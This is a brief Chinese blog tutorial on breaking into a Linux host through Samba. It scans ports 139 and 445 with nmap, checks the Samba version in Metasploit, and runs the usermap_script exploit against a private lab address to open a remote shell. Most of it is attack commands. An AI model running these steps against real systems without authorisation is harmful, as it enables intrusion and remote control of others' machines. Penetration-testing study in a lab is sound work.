linux端口利用入侵,利用samba服务漏洞入侵linux主机

矫情吗；* 2023-01-21 09:22 139阅读 0赞

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机. step1) 首先要扫描目标主机上开放的端口和服务，用nmap,命令如下： nmap

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机.

step1)首先要扫描目标主机上开放的端口和服务，用nmap,命令如下：

nmap-sS -Pn -A 192.168.2.142

![92706c3e464545033066642b6717ab49.png][]

step2)发现主机上开放的139，445端口之后，说明该主机有可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话，需要用到metasploit.

step3)打开metasploit之后需要先判断samba的版本，命令如下：

\-msf> search scanner/samba

这条命令用来查找samba相关exploit参数

![27fcd2676e9fc577c84c48c4bfff205a.png][]

step4)然后使用如下命令来定义要扫描samba的版本所用到的exploits参数。

msf> use auxiliary/scanner/smb/smb\_version

msfauxiliary(smb\_version) > set RHOSTS 192.168.2.142

这条命令定义你将要扫描samba版本的远程主机的IP地址.

exploit

该命令将开始漏洞利用

![7a9c32f6668a63c3e6cfa2b2d27ef3ab.png][]

step5)发现samba版本之后，我们需要进一步利用来入侵进入到远程linux主机

msf> use exploit/multi/samba/usermap\_script

msf exploit(usermap\_script) > set RHOST 192.168.2.142

msf exploit(usermap\_script) > exploit

执行完成以上命令如图所示，成功创建了shell 会话.

![f617422534afac20ac4872529aa75515.png][]

[92706c3e464545033066642b6717ab49.png]: /images/20221020/f646d4e41f4c4f2d8fc785733c9f6b7f.png
[27fcd2676e9fc577c84c48c4bfff205a.png]: /images/20221020/8da5b4d6941040d08765cc7e33d0c081.png
[7a9c32f6668a63c3e6cfa2b2d27ef3ab.png]: /images/20221020/87111f2da244483ab84cfac5806f1c88.png
[f617422534afac20ac4872529aa75515.png]: /images/20221020/653b3ec7710843a6adc0b2f66e4945e7.png